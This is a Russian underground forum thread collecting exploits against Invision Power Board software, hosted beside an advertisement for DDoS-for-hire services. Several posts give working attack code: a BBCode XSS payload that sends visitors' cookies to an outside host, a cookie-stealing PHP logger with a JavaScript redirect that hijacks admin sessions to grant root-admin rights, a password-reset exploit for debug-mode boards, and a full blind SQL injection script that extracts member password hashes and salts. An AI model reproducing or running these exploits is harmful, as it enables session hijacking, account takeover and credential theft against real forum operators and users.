Перейти к содержимому

 Друзья: Всё для вебмастера | [ Реклама на форуме ]


Rutor
Rutor


[ DDos Услуги. DDos атака. Заказать ДДос ]


[ Уязвимости IPB ]

Автор Denis---Player , 09 Jan 2007 20:55

  • Авторизуйтесь для ответа в теме
Сообщений в теме: 15

#1
Denis---Player
Отправлено 09 January 2007 - 20:55

Denis---Player

    Байт

  • Members
  • Pip
  • 90 сообщений
XSS в IPB by White Jordan


Суть баги заключается во вложенных тегах. Взлом можно осуществить только в том случае если админ пользуется ослом. В мозилле и Опере баг работать не будет...


[post=1000[topic=wj style=background:url(java script:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie); ][/topic]][/post]
Ето XSS код, который необходим для взлома.

#2
$iD
Отправлено 04 June 2007 - 07:01

$iD

    Админ

  • root
  • PipPipPipPipPipPip
  • 3785 сообщений
Invision Power Board 2.2.2, возможно более ранние версии.

Опасность: Низкая
Наличие эксплоита: Неизвестно

Описание:
Уязвимость позволяет удаленному пользователю произвести XSS нападение.

Уязвимость существует из-за недостаточной обработки входных данных в параметре "editorid" в сценарии jscripts/folder_rte_files/module_table.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта.

www.invisionboard.com

Решение: Установите исправление с сайта производителя.
forums.invisionpower.com/index.php?act=attach&type=post&id=11669

Реклама на форуме! | Есть идеи? | Хочешь стать модератором?

#3
$iD
Отправлено 05 June 2007 - 08:34

$iD

    Админ

  • root
  • PipPipPipPipPipPip
  • 3785 сообщений
IPB <= 2.2.2 XSS Exploit
Вот вам сплойт под 2.2.2 =)
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # 
# 
#   Invision Power Board 2.2.2 Cross Site Scripting vulnerability 
# 
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # 
#   Vendor site: http://www.invisionboard.com/ 
#   Vulnerability found by Iron (ironwarez.info) 
# 
#   Greets to all **** Security Group members	
# 
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # 
#   The vulnerability: 
#   Open up any php file in /jscripts/folder_rte_files 
#	See: 

	var editor_id		 = <?php print '"'.trim($_REQUEST['editorid']).'";'; ?> 
	
# 
#   $_REQUEST['editorid'] isn't sanitized in any way, so allows 
#   other uses to execute their own code. 
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # 
#   PoC (Log cookies & run SQL query) 
# 
#   Requirements: server supporting PHP, user account on 
#   target forum, database prefix needs to be known. 
# 
#   Create a file called name.php on your webserver and put this code in it: 
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # 

<?php 
$target = "http://www.yourtarget.com/forum"; #Target forum without trailing slash 
$prefix = "ibf_"; #Database prefix, default: ibf_ 
$member = 22; #Member id to promote 
$newgroup = 4; # The id of the new group to promote, normally 4 is root admin 

$ip = $_SERVER['REMOTE_ADDR']; 
$referer = $_SERVER['HTTP_REFERER']; 
$agent = $_SERVER['HTTP_USER_AGENT']; 

$data = $_GET['c']; 
$time = date("Y-m-d G:i:s A"); 
$text = "Time: ".$time."\nIP:".$ip."\nReferer:".$referer."\nUser-Agent:".$agent."\nCookie:".$data."\n\n"; 

$file = fopen('log.txt' , 'a'); 
fwrite($file,$text); 
fclose($file); 
if(preg_match("/ipb_admin_session_id=([0-9a-z]{32});/",$data,$stuff)) 
{ 
print '<img width=0 height=0 src="'.$target.'/admin/index.php?adsess='.$stuff[1].'&act=sql&code=runsql&section=admin&query=
UPDATE+'.$prefix.'members+SET+mgroup+%3D+%27'.$newgroup.'%27+WHERE+id+%3D+%27'
.$member.'%27&st="></>'; 
} 
?> 
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # 
#	Also create a file in the same directory named "log.txt" and chmod it 777 
# 
#	Now, create a file called script.js on your webserver, put this code in it: 
# 
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # 

document.location="http://www.yourownsite.com/path/to/file/name.php?c="+document.cookie; 

# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # 
# 
#	And, last but not least, create a file that combines those two;) 
#	Name it blah.html and put this code in it: 
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # 

<iframe border=0 src="http://www.targetforum.com/forum_folder/jscripts/folder_rte_files/module_table.php?
editorid=//--></
script><script src=http://www.yourownsite.com/path/to/file/script.js>" width=0 height=0></iframe>

Реклама на форуме! | Есть идеи? | Хочешь стать модератором?

#4
s0ket
Отправлено 08 June 2007 - 08:43

s0ket

    Бит

  • Honourаble
  • 18 сообщений
Denis---Player
хех, хотьбы копирайты поставил!
icq: 251125

#5
$iD
Отправлено 23 January 2008 - 21:24

$iD

    Админ

  • root
  • PipPipPipPipPipPip
  • 3785 сообщений

Реклама на форуме! | Есть идеи? | Хочешь стать модератором?

#6
###
Отправлено 16 June 2008 - 20:32

###

    Экзабайт

  • Advanced
  • PipPipPipPipPipPip
  • 1743 сообщений
Debug Mode password change vulnerability
Скрытый текст
<?php
// -----------------------------
//Debug Mode password change vulnerability
//Affects Invision Power Borard 2.0.0 to 2.1.7
//by Rapigator

//This works if:

//"Debug Level" is set to 3
//or
//Enable SQL Debug Mode is turned on

//In General Configuration of the forum software.


// The forum's address up to and including 'index.php'
$site = "http://localhost/for...ums/index.php";

// An existing user's login name
$name = "admin";

// The new password(3-32 characters)
$pass = "1234";

// You can use a proxy...
// $proxy = "1.2.3.4:8080";



// -----------------------------
$site .= "?";
$suffix = "";
$name = urlencode($name);
$pass = urlencode($pass);
$curl = curl_init($site.'act=Reg&CODE=10');
curl_setopt($curl, CURLOPT_PROXY, $proxy);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($curl, CURLOPT_TIMEOUT, 10);
$page = curl_exec($curl);
curl_close($curl);
if (preg_match('/<span class=\'green\'>INSERT<\/span> INTO <span class=\'purple\'>([\\w]*?)_reg_antispam<\/span> \\(regid,regcode,ip_address,ctime\\) VALUES\\(\'([\\w]{32}?)\',([\\d]*?),/', $page, $regs)) {
   $prefix = $regs[1];
   $regid = $regs[2];
   $regcode = $regs[3];
} else {
   $suffix = "&debug=1";
   $curl = curl_init($site.'act=Reg&CODE=10'.$suffix);
   curl_setopt($curl, CURLOPT_PROXY, $proxy);
   curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
   curl_setopt($curl, CURLOPT_TIMEOUT, 10);
   $page = curl_exec($curl);
   curl_close($curl);
   if (preg_match('/INSERT INTO ([\\w]*?)_reg_antispam \\(regid,regcode,ip_address,ctime\\) VALUES\\(\'([\\w]{32}?)\',([\\d]*?),/', $page, $regs)) {
       $prefix = $regs[1];
       $regid = $regs[2];
       $regcode = $regs[3];
   }
}
if (!isset($regid) || !isset($regcode)) {
   echo "Error: Probably not vulnerable, or no forum found";
   exit;
}

$curl = curl_init($site.$suffix);
curl_setopt($curl, CURLOPT_PROXY, $proxy);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($curl, CURLOPT_POST, 1);
curl_setopt($curl, CURLOPT_POSTFIELDS, "act=Reg&CODE=11&member_name={$name}&regid={$regid}&reg_code={$regcode}");
curl_setopt($curl, CURLOPT_TIMEOUT, 10);
$page = curl_exec($curl);
curl_close($curl);
if (preg_match('/<span class=\'green\'>INSERT<\/span> INTO <span class=\'purple\'>'.$prefix.'_validating<\/span> \\(vid,member_id,real_group,temp_group,entry_date,coppa_user,lost_pass,ip_address\\) VALUES\\(\'([\\w]{32}?)\',([\\d]{1,32}?),/', $page, $regs)) {
   change_pass($regcode,$regid,$regs[1],$regs[2]);
}
if (preg_match('/INSERT INTO '.$prefix.'_validating \\(vid,member_id,real_group,temp_group,entry_date,coppa_user,lost_pass,ip_address\\) VALUES\\(\'([\\w]{32}?)\',([\\d]{1,32}?),/', $page, $regs)) {
   change_pass($regcode,$regid,$regs[1],$regs[2]);
}

function change_pass($regcode,$regid,$vid,$userid) {
   global $site, $proxy, $name, $pass;
   $curl = curl_init($site.$suffix);
   curl_setopt($curl, CURLOPT_PROXY, $proxy);
   curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
   curl_setopt($curl, CURLOPT_POST, 1);
   curl_setopt($curl, CURLOPT_POSTFIELDS, "act=Reg&CODE=03&type=lostpass&uid={$userid}&aid={$vid}&regid={$regid}&reg_code={$regcode}&pass1={$pass}&pass2={$pass}");
   curl_setopt($curl, CURLOPT_TIMEOUT, 10);
   $page = curl_exec($curl);
   curl_close($curl);
   echo "Password Changed!";
   exit;
}
?>

Ссылки из под хайдов не выдаю!

#7
###
Отправлено 22 September 2008 - 19:49

###

    Экзабайт

  • Advanced
  • PipPipPipPipPipPip
  • 1743 сообщений
Invision Power Board <= 2.3.5 Remote SQL Injection Exploit

Ссылки из под хайдов не выдаю!

#8
bonkers
Отправлено 12 October 2008 - 10:34

bonkers

    Бит

  • Members
  • 1 сообщений
###, и что с этим делать?!

#9
MrBonD
Отправлено 12 October 2008 - 10:40

MrBonD

    UkrainiaN MaFia

  • Honourаble
  • PipPipPipPip
  • 777 сообщений
bonkers, ознакомься с темой про SQL injection
Изображение
ИНФА О ЛЮБОМ ЧЕЛОВЕКЕ ПО UKR ТУТ
--- "Бачу-бачу власний трилер з понеділка по неділю..." ---

#10
$iD
Отправлено 12 October 2008 - 10:57

$iD

    Админ

  • root
  • PipPipPipPipPipPip
  • 3785 сообщений
bonkers
И еще вот с этой: FAQ B)

Реклама на форуме! | Есть идеи? | Хочешь стать модератором?

#11
###
Отправлено 06 January 2009 - 21:01

###

    Экзабайт

  • Advanced
  • PipPipPipPipPipPip
  • 1743 сообщений
IPB 2.3.3 SQL injection

Ссылки из под хайдов не выдаю!

#12
###
Отправлено 27 April 2009 - 21:00

###

    Экзабайт

  • Advanced
  • PipPipPipPipPipPip
  • 1743 сообщений
Invision Power Board 3.0.0b5 Active XSS & Path Disclosure Vulns
вот и первая xss в 3 версии.

Ссылки из под хайдов не выдаю!

#13
###
Отправлено 24 May 2010 - 10:09

###

    Экзабайт

  • Advanced
  • PipPipPipPipPipPip
  • 1743 сообщений
IPB 3.0.1 sql injection exploit
<?php
error_reporting(E_ALL);
//////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////
// IPB 3.0.1 sql injection exploit
// Version 1.0
// written by Cryptovirus
// ]]>[url="http://forum.prologic.su/go.php?http://de.crypt.in/"]http://de.crypt.in/[/url]]]>
// 31. january 2010
//
// FEATURES:
// 1. Fetching algorithm optimized for speed
// 2. Attack goes through $_POST, so no suspicious logs
// 3. Pretesting saves time if IPB is not vulnerable
// 4. curl extension autoloading
// 5. log format compatible with passwordspro
//
// NB! This exploit is meant to be run as php CLI!
// ]]>[url="http://forum.prologic.su/go.php?http://www.php.net/features.commandline"]http://www.php.net/f...ommandline[/url]]]>
///////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////
//================================================== ===================
$cli = php_sapi_name() === 'cli';
//================================================== ===================
// Die, if executed from webserver
//================================================== ===================
if(!$cli)
{
echo "<html><head><title>Attention!</title></head>\n";
echo "<body><br /><br /><center>\n";
echo "<h1>Error!</h1>\n";
echo "This exploit is meant to be used as php CLI script!<br />\n";
echo "More information:<br />\n";
echo "<a href=\"http://www.google.co...p cli windows\" target=\"_blank\">http://www.google.co... windows</a><br />\n";
echo "This script will not run through a webserver.<br />\n";
echo "</center></body></html>\n";
exit;
}
//================================================== ===================
// Print the awesome de.crypt.in logo
//================================================== ===================
echo "\n _ _ _ ";
echo "\n __| | ___ ___ _ __ _ _ _ __ | |_ (_)_ __ ";
echo "\n / _` |/ _ \ / __| '__| | | | '_ \| __| | | '_ \ ";
echo "\n| (_| | __/| (__| | | |_| | |_) | |_ _| | | | |";
echo "\n \__,_|\___(_)___|_| \__, | .__/ \__(_)_|_| |_|";
echo "\n |___/|_| \n\n";
//================================================== ===================
// Check if all command line arguments were passed
//================================================== ===================
if(!isset($argv[1])||!isset($argv[2])||!isset($argv[3])){
echo "Usage: php ".$_SERVER['PHP_SELF']." <target> <userid> <option> [login] [password]\n";
echo "\n";
echo "NOTE: Login and password are optional, use for forums that require registration.\n";
echo "Options: 1 - Fetch username, 2 - Fetch password hash\n\n";
echo "Example: php ".$_SERVER['PHP_SELF']." ]]>[url="http://forum.prologic.su/go.php?http://ipb.com/board/"]http://ipb.com/board/[/url]]]> 1 1 foo bar\n";
die;
}
//================================================== ===================
// Set some important variables...
//================================================== ===================
$topicname = '';
$url = $argv[1];
$chosen_id = $argv[2];
$ch_option = $argv[3];
if(isset($argv[4])){
if(isset($argv[5])){
$user_login = $argv[4];
$user_pass = $argv[5];
}
else{
echo "Error: Password not specified with username\n";
die;
}
}
# Proxy settings
# Be sure to use proxy
//$proxy_ip_port = '127.0.0.1:8118';
//$proxy_user_password = 'someuser:somepassword';
$outfile = './ipb_log.txt'; //Log file

if(!extension_loaded('curl'))
{
if(!dl('php_curl.dll'))
{
die("Curl extension not loaded!\n Fatal exit ...\n");
}
else
{
echo "Curl loading success\n";
}
}
//================================================== ===================
xecho("Target: $url\n");
xecho("Testing target URL ... \n");
test_target_url();
xecho("Target URL seems to be valid\n");
add_line("==========================================");
add_line("Target: $url");
if(isset($argv[4])){
login_to_forum($argv[4], $argv[5]);
}
$i = $chosen_id;
echo "Fetching topics from ID $i\n";
if(!fetch_target_id($i))
{
echo "No topics found.\n";
fwrite(STDOUT, "Last ditch effort, enter topic: ");
$topicname = trim(fgets(STDIN));
}
else echo "Topic found! Hacktime.\n";

// Check chosen option and proceed accordingly
add_line("------------------------------------------");
if($ch_option == 2){
$hash = get_hash($i);
$salt = get_salt($i);
$line = "$i:$hash:$salt";
add_line($line);
xecho("\n------------------------------------------\n");
xecho("User ID: $i\n");
xecho("Hash: $hash\n");
xecho("Salt: $salt");
xecho("\n------------------------------------------\n");
}
else if($ch_option == 1){
$uname = get_user($i);
$line = "The username for id $i is $uname";
add_line($line);
xecho("$uname");
}
xecho("\nQuestions and feedback - ]]>[url="http://forum.prologic.su/go.php?http://de.crypt.in/"]http://de.crypt.in/[/url]]]> \n");
die(" \n");
//////////////////////////////////////////////////////////////////////
function login_to_forum($user, $pass)
{
global $url;
$post = 'app=core&module=global&section=login&do=process&username='.$user.'&password='.$pass.'&rememberMe=1';
$buff = trim(make_post($url, $post, '', $url));
if(strpos($buff,'The login was successful!')>0){
xecho("Logged in.\n");
}
else{
xecho("Error: Unable to login.");
die;
}
}
//////////////////////////////////////////////////////////////////////
function test_target_url()
{
global $url;

$post = 'app=core&module=search&section=search&do=quick_search&search_app=core&fromsearch=1&search_filter_app%5Ball%5D=1&content_title_only=1&search_term=test%2527';
$buff = trim(make_post($url, $post, '', $url));

if(strpos($buff,'Moved Permanently')>0)
{
die('Ivalid. Try adding trailing slash to url. Exiting ...');
}

if(strpos($buff,'No results found for')>0)
{
die('Target is patched? Exiting ...');
}
}
//////////////////////////////////////////////////////////////////////
function fetch_target_id($id)
{
global $url, $topicname;
$post = 'app=core&module=search&do=user_posts&mid='.$id.'&view_by_title=1&search_filter_app%5Bforums%5D=1';
$buff = trim(make_post($url, $post, '', $url));
if(strpos($buff,'View result')>0){
$location = strpos($buff,'View result');
$start = strpos($buff,'>',$location)+1;
$end = strpos($buff,'</a>',$start);
$topicname = substr($buff,$start,($end-$start));
return true;
}
else return false;
}
///////////////////////////////////////////////////////////////////////
function get_salt($id)
{
$len = 5;
$out = '';
xecho("Finding salt ...\n");
for($i = 1; $i < $len + 1; $i ++)
{
$ch = get_saltchar($i, $id);
xecho("Got pos $i --> $ch\n");
$out .= "$ch";
xecho("Current salt: $out \n");
}
xecho("\nFinal salt for ID $id: $out\n\n");
return $out;
}
///////////////////////////////////////////////////////////////////////
function get_saltchar($pos, $id)
{
global $prefix;
$char = '';
$min = 32;
$max = 128;
$pattern = 'm.member_id='.$id.' AND ORD(SUBSTR(m.members_pass_salt,'.$pos.',1))';
$curr = 0;
while(1)
{
$area = $max - $min;
if($area < 2 )
{
$post = $pattern . "=$max";
$eq = test_condition($post);
if($eq)
{
$char = chr($max);
}
else
{
$char = chr($min);
}
break;
}

$half = intval(floor($area / 2));
$curr = $min + $half;
$post = $pattern . '%253e' . $curr;
$bigger = test_condition($post);
if($bigger)
{
$min = $curr;
}
else
{
$max = $curr;
}
xecho("Current test: $curr-$max-$min\n");
}
return $char;
}
///////////////////////////////////////////////////////////////////////
function get_hash($id)
{
$len = 32;
$out = '';
xecho("Finding hash ...\n");
for($i = 1; $i < $len + 1; $i ++)
{
$ch = get_hashchar($i, $id);
xecho("Got pos $i --> $ch\n");
$out .= "$ch";
xecho("Current hash: $out \n");
}
xecho("\nFinal hash for ID $id: $out\n\n");
return $out;
}
///////////////////////////////////////////////////////////////////////
function get_hashchar($pos, $id)
{
global $prefix;
$char = '';
$pattern = 'm.member_id='.$id.' AND ORD(SUBSTR(m.members_pass_hash,'.$pos.',1))';
// First let's determine, if it's number or letter
$post = $pattern . '%253e57';
$letter = test_condition($post);
if($letter)
{
$min = 97;
$max = 102;
xecho("Char to find is [a-f]\n");
}
else
{
$min = 48;
$max = 57;
xecho("Char to find is [0-9]\n");
}
$curr = 0;
while(1)
{
$area = $max - $min;
if($area < 2 )
{
$post = $pattern . "=$max";
$eq = test_condition($post);
if($eq)
{
$char = chr($max);
}
else
{
$char = chr($min);
}
break;
}

$half = intval(floor($area / 2));
$curr = $min + $half;
$post = $pattern . '%253e' . $curr;
$bigger = test_condition($post);
if($bigger)
{
$min = $curr;
}
else
{
$max = $curr;
}
xecho("Current test: $curr-$max-$min\n");
}
return $char;
}
///////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////
function get_user($id)
{
$len = 32;
$out = '';

xecho("Finding username ...\n");

for($i = 1; $i < $len + 1; $i ++)
{
$ch = get_userchar($i, $id);
xecho("Got pos $i --> $ch\n");
$out .= "$ch";
xecho("Current username: $out \n");
}

xecho("\nFinal username for ID $id: $out\n\n");

return $out;
}
///////////////////////////////////////////////////////////////////////
function get_userchar($pos, $id)
{
global $prefix;

$char = '';
$pattern = 'm.member_id='.$id.' AND ORD(SUBSTR(m.name,'.$pos.',1))';

// First let's determine, if it's number or letter
$post = $pattern . '%253e57';
$letter = test_condition($post);

if($letter)
{
$min = 65;
$max = 122;
xecho("Char to find is [a-f]\n");
}
else
{
$min = 48;
$max = 57;
xecho("Char to find is [0-9]\n");
}

$curr = 0;

while(1)
{
$area = $max - $min;
if($area < 2 )
{
$post = $pattern . "=$max";
$eq = test_condition($post);

if($eq)
{
$char = chr($max);
}
else
{
$char = chr($min);
}

break;
}

$half = intval(floor($area / 2));
$curr = $min + $half;

$post = $pattern . '%253e' . $curr;

$bigger = test_condition($post);

if($bigger)
{
$min = $curr;
}
else
{
$max = $curr;
}

xecho("Current test: $curr-$max-$min\n");
}

return $char;
}
///////////////////////////////////////////////////////////////////////
function test_condition($p)
{
global $url;
global $topicname;

$bret = false;
$maxtry = 10;
$try = 1;

$pattern = 'app=core&module=search&section=search&do=quick_search&search_app=core&fromsearch=1&search_filter_app%%5Ball%%5D=1&content_title_only=
1&search_term='.$topicname.'%%2527 IN BOOLEAN MODE) AND %s AND MATCH(t.title) AGAINST(%%2527'.$topicname;
$post = sprintf($pattern, $p);

while(1)
{
$buff = trim(make_post($url, $post, '', $url));

if(strpos($buff,'Your search for the term <em><strong>')>0)
{
$bret = true;
break;
}
elseif(strpos($buff,'No results found for')>0)
{
break;
}
elseif(strpos($buff, 'Driver Error</title>') !== false)
{
die("Sql error! Wrong prefix?\nExiting ... ");
}
else
{
xecho("test_condition() - try $try - invalid return value ...\n");
xecho("Will wait 30 seconds for flood control. Expect 2-3 tries.\n");
xecho("This is going to take years...\n");
sleep(10);
$try ++;
if($try > $maxtry)
{
die("Too many tries - exiting ...\n");
}
else
{
xecho("Trying again - try $try ...\n");
}
}
}

return $bret;
}
///////////////////////////////////////////////////////////////////////
function make_post($url, $post_fields='', $cookie = '', $referer = '', $headers = FALSE)
{
$ch = curl_init();
$timeout = 120;
curl_setopt ($ch, CURLOPT_URL, $url);
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_fields);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
curl_setopt ($ch, CURLOPT_USERAGENT, 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1');
curl_setopt ($ch, CURLOPT_COOKIEJAR, 'cookies.txt');
curl_setopt ($ch, CURLOPT_COOKIEFILE, 'cookies.txt');


if(!empty($GLOBALS['proxy_ip_port']))
{
curl_setopt($ch, CURLOPT_PROXY, $GLOBALS['proxy_ip_port']);

if(!empty($GLOBALS['proxy_user_password']))
{
curl_setopt($ch, CURLOPT_PROXYUSERPWD, $GLOBALS['proxy_user_password']);
}
}

if(!empty($cookie))
{
curl_setopt ($ch, CURLOPT_COOKIE, $cookie);
}

if(!empty($referer))
{
curl_setopt ($ch, CURLOPT_REFERER, $referer);
}

if($headers === TRUE)
{
curl_setopt ($ch, CURLOPT_HEADER, TRUE);
}
else
{
curl_setopt ($ch, CURLOPT_HEADER, FALSE);
}

$fc = curl_exec($ch);
curl_close($ch);

return $fc;
}
///////////////////////////////////////////////////////////////////////
function add_line($line)
{
global $outfile;
$line .= "\r\n";
$fh = fopen($outfile, 'ab');
fwrite($fh, $line);
fclose($fh);
}
///////////////////////////////////////////////////////////////////////
function xecho($line)
{
if($GLOBALS['cli'])
{
echo "$line";
}
else
{
$line = nl2br(htmlspecialchars($line));
echo "$line";
}
}
///////////////////////////////////////////////////////////////////////
?>

Ссылки из под хайдов не выдаю!

#14
###
Отправлено 29 May 2010 - 19:11

###

    Экзабайт

  • Advanced
  • PipPipPipPipPipPip
  • 1743 сообщений
IP.Board (IPB) 3.0.x Persistent XSS Vulnerability

Ссылки из под хайдов не выдаю!

#15
Fin
Отправлено 20 May 2011 - 16:41

Fin

    Бит

  • Banned
  • 15 сообщений
у меня заработала и в более ранней версии.

#16
$iD
Отправлено 17 April 2012 - 13:56

$iD

    Админ

  • root
  • PipPipPipPipPipPip
  • 3785 сообщений
Invision Power Board 3.3.0 Local File Inclusion

Реклама на форуме! | Есть идеи? | Хочешь стать модератором?

Обратно в Web уязвимости

Количество пользователей, читающих эту тему: 0

0 пользователей, 0 гостей, 0 анонимных

  1. ProLogic.Su
  2. Underground
  3. Уязвимости и Сплойты
  4. Web уязвимости